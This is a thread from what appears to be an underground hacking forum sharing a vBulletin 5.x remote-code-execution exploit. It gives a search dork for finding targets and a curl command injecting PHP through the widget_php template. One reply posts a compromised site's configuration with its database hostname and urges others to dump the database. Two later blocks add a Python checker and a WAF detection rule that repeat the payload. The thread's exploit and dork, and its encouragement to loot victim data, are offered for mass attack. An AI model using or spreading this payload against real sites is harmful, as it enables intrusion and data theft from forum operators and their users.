RCE, vBulletin 5xx, CVE-N/A (Bypass CVE-2019-16759)

phant0m | CD disk | User | registered 01.05.2020 | messages: 11 | reactions: 16
0day RCE exploit on vBulletin 5xx

dork
Code:
intext:"Powered by vBulletin"

POC
Code:
curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

[ATTACH=full]13040[/ATTACH] (EfDNzL5WAAAzTBq.png)
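The check behind this PoC can be scripted rather than clicked through in a proxy. The block below is an added example, not code from the thread, from vBulletin, or from the poster: it sends exactly the PoC's parameters to `/ajax/render/widget_tabbedcontainer_tab_panel` (the vector later tracked as CVE-2020-17496), but the injected PHP only echoes a random marker instead of calling `shell_exec`, so a hit is unambiguous and does nothing on the host. The reply is classified the way this thread describes it: marker echoed back means the sub-widget's PHP ran (unpatched); an empty render `{"template":"","css_links":[]}` means the template was refused (patched). `mock_vbulletin` is a constructed stand-in transport so the script runs offline; `http_post`, `check`, `classify` and the `forum.example` hostname are this example's own names, and the verdict strings are its own convention.

```python
"""Checker for the vBulletin 5.x widget_php sub-widget render vector (CVE-2020-17496).
Added example: not the thread's code and not vBulletin's. Only the endpoint path
and the two form parameters come from the PoC above."""
import json
import secrets
import urllib.error
import urllib.parse
import urllib.request

RENDER_PATH = "/ajax/render/widget_tabbedcontainer_tab_panel"


def build_payload(marker: str) -> bytes:
    """Same parameters as the PoC, but the PHP only echoes a random marker and exits."""
    form = {
        "subWidgets[0][template]": "widget_php",
        "subWidgets[0][config][code]": f'echo "{marker}"; exit;',
    }
    return urllib.parse.urlencode(form).encode()


def classify(body: str, marker: str) -> str:
    """Map the reply to a verdict:
    marker present            -> the injected PHP ran: "vulnerable"
    {"template":"", ...} JSON -> widget_php was refused: "patched"
    empty body                -> "no-response" (target unreachable)
    anything else             -> "unknown" (WAF, error page, not vBulletin 5)"""
    if not body:
        return "no-response"
    if marker in body:
        return "vulnerable"
    try:
        data = json.loads(body)
    except ValueError:
        return "unknown"
    if isinstance(data, dict) and data.get("template") == "":
        return "patched"
    return "unknown"


def http_post(url: str, body: bytes, timeout: float = 10.0) -> str:
    """Default transport: one POST over urllib; 4xx/5xx bodies are still returned."""
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.read().decode("utf-8", "replace")
    except urllib.error.URLError:
        return ""  # classify() reports this as "no-response"


def check(base_url: str, post=http_post) -> str:
    """Run the marker probe against base_url (e.g. https://forum.example) and classify."""
    marker = secrets.token_hex(8)
    body = post(base_url.rstrip("/") + RENDER_PATH, build_payload(marker))
    return classify(body, marker)


def mock_vbulletin(patched: bool):
    """Constructed stand-in transport, so the demo runs offline. It never evaluates
    PHP: for an unpatched install it simulates what `echo "<marker>"; exit;` would
    print; for a patched one it returns the empty-render JSON seen in this thread."""
    def post(url: str, body: bytes) -> str:
        form = urllib.parse.parse_qs(body.decode())
        template = form.get("subWidgets[0][template]", [""])[0]
        code = form.get("subWidgets[0][config][code]", [""])[0]
        if (not patched and urllib.parse.urlsplit(url).path == RENDER_PATH
                and template == "widget_php"):
            return code.split('"')[1] if code.count('"') >= 2 else ""
        return json.dumps({"template": "", "css_links": []})
    return post


def demo() -> dict:
    """Probe both mock behaviours; hostname is a placeholder."""
    return {
        "vulnerable": check("http://forum.example", post=mock_vbulletin(patched=False)),
        "patched": check("http://forum.example", post=mock_vbulletin(patched=True)),
    }


if __name__ == "__main__":
    print(demo())  # prints {'vulnerable': 'vulnerable', 'patched': 'patched'}
```

Against a live host, `check("https://SITE")` uses the real `http_post`; the marker is regenerated per call, so a cached or replayed response cannot produce a false "vulnerable".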
 

w00du | ripper / КИДАЛА (scammer) | registered 22.10.2019 | messages: 253 | reactions: 72
Please note that this user is banned.
good job
 

xp3rt | floppy disk | User | registered 12.08.2020 | messages: 1 | reactions: 2
Yeah it's nice RCE, hopefully we have dumped good DBs. Let me start my contribution by sharing from this POC.


Code:
// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database
// will be located. Currently the only option is mysqli. MariaDB uses the same
// libraries as MySQL and should use mysqli as the dbtype. For slave support add
// _slave to the end of the database class.
$config['Database']['dbtype'] = 'mysqli';

// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
$config['Database']['dbname'] = '[redacted]';

// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = '[redacted]';


// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put here, leave the default values.
//
// Note: If you are using IIS 7+ and MySQL is on the same machine, you
// need to use 127.0.0.1 instead of localhost
$config['MasterServer']['servername'] = 'sql31.mcb.webhuset.no';
$config['MasterServer']['port'] = 3306;

// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = '[redacted]';
$config['MasterServer']['password'] = '[redacted]';

Please help yourself to dump it.
 

h4x0rb0y | floppy disk | User | registered 05.08.2020 | messages: 3 | reactions: 1
[QUOTE="phant0m, post: 249811, member: 196571"]
0day RCE exploit on vBulletin 5xx

dork
Code:
intext:"Powered by vBulletin"

POC
Code:
curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

[ATTACH=full]13040[/ATTACH]
[/QUOTE]

What is the name of the checker program?
 

phant0m | CD disk | User | registered 01.05.2020 | messages: 11 | reactions: 16
[QUOTE="h4x0rb0y"]
[QUOTE="phant0m, post: 249811, member: 196571"]
0day RCE exploit on vBulletin 5xx [...]
[/QUOTE]

What is the name of the checker program?
[/QUOTE]

Burp Suite
 

buyacc | HDD-drive | User | registered 19.07.2019 | messages: 35 | reactions: 21
[QUOTE="phant0m, post: 249811, member: 196571"]
0day RCE exploit on vBulletin 5xx

dork
Code:
intext:"Powered by vBulletin"

POC
Code:
curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
[/QUOTE]

Can you help me please?
When I try to repeat this I get a blank page or something like this:
Code:
{"template":"","css_links":[]}
What can be wrong?
I tried on different 5.x.x versions of vBulletin.
 

phant0m | CD disk | User | registered 01.05.2020 | messages: 11 | reactions: 16
[QUOTE="buyacc"]
Can you help me please?
When I try to repeat this I get a blank page or something like this:
Code:
{"template":"","css_links":[]}
What can be wrong?
I tried on different 5.x.x versions of vBulletin.
[/QUOTE]

Maybe you are trying to attack a patched version.
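The defender's side of the same exchange, added here as an example that is not from the thread or from vBulletin: a request-inspection rule of the kind a WAF or reverse proxy in front of a vBulletin 5 install would apply. It generalises beyond the PoC in this thread: besides `subWidgets[N][template]=widget_php` on an `/ajax/render/` path, it also flags the older `routestring=ajax/render/widget_php` form that CVE-2019-16759 used (the bug this thread's title says is being bypassed) and survives one extra layer of percent-encoding. The sample requests in `SAMPLES` are constructed, not captured traffic; `decode_form`, `is_widget_php_attempt` and `scan` are this example's own names.

```python
"""Request-inspection rule for vBulletin 5 widget_php render attempts.
Added example, not code from the thread or from vBulletin. Covers the
2020 sub-widget form from the PoC above and the 2019 routestring form."""
import urllib.parse

RENDER_PREFIX = "ajax/render/"


def decode_form(raw: str) -> dict:
    """Parse x-www-form-urlencoded into {key: [values]}. parse_qs decodes one
    layer of percent-encoding; a second unquote catches double-encoded payloads
    (%255B -> %5B -> '[') that a naive substring match on the raw body misses."""
    form = {}
    for key, values in urllib.parse.parse_qs(raw, keep_blank_values=True).items():
        k = urllib.parse.unquote_plus(key)
        form.setdefault(k, []).extend(urllib.parse.unquote_plus(v) for v in values)
    return form


def is_widget_php_attempt(method: str, path: str, query: str, body: str) -> bool:
    """True when the request asks vB5's ajax/render controller to render the
    widget_php template, whichever parameter the template name travels in."""
    fields = decode_form(query)
    for k, v in decode_form(body).items():
        fields.setdefault(k, []).extend(v)

    # vB5 lets a routestring parameter select the route, so inspect it as well
    # as the URL path (the 2019 form posted to / with routestring=ajax/render/widget_php).
    routes = [urllib.parse.unquote_plus(path)] + fields.get("routestring", [])
    if not any(RENDER_PREFIX in r for r in routes):
        return False
    if any(RENDER_PREFIX + "widget_php" in r for r in routes):
        return True

    # 2020 form: the template name is smuggled in as a sub-widget of another
    # widget (widget_tabbedcontainer_tab_panel in the PoC), so the route itself
    # looks harmless and only the nested [template] field names widget_php.
    for key, values in fields.items():
        if key.endswith("[template]") and "widget_php" in values:
            return True
    return False


# Constructed sample requests: (method, path, query string, body).
SAMPLES = {
    "poc_2020": (
        "POST", "/ajax/render/widget_tabbedcontainer_tab_panel", "",
        'subWidgets[0][template]=widget_php'
        '&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;',
    ),
    "double_encoded": (
        "POST", "/ajax/render/widget_tabbedcontainer_tab_panel", "",
        "subWidgets%255B0%255D%255Btemplate%255D=widget%255Fphp"
        "&subWidgets%255B0%255D%255Bconfig%255D%255Bcode%255D=phpinfo()%253B",
    ),
    "poc_2019": (
        "POST", "/index.php", "routestring=ajax/render/widget_php",
        'widgetConfig[code]=echo%20shell_exec("id");',
    ),
    "legit_render": (
        "POST", "/ajax/render/widget_tabbedcontainer_tab_panel", "",
        "subWidgets[0][template]=widget_search&subWidgets[0][config][title]=Search",
    ),
    "plain_page": ("GET", "/forum/general-discussion", "", ""),
}


def scan(samples=SAMPLES) -> dict:
    """Apply the rule to each sample; returns {name: flagged}."""
    return {name: is_widget_php_attempt(*req) for name, req in samples.items()}


if __name__ == "__main__":
    for name, flagged in scan().items():
        print(f"{name:15} {'BLOCK' if flagged else 'allow'}")
```

The rule keys on the template name rather than on `shell_exec` or other PHP tokens, because once `widget_php` renders the attacker controls the whole `[config][code]` string and any token blacklist is trivially rewritten. Legitimate renders of other sub-widget templates, such as `widget_search` in the sample set, still pass.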
 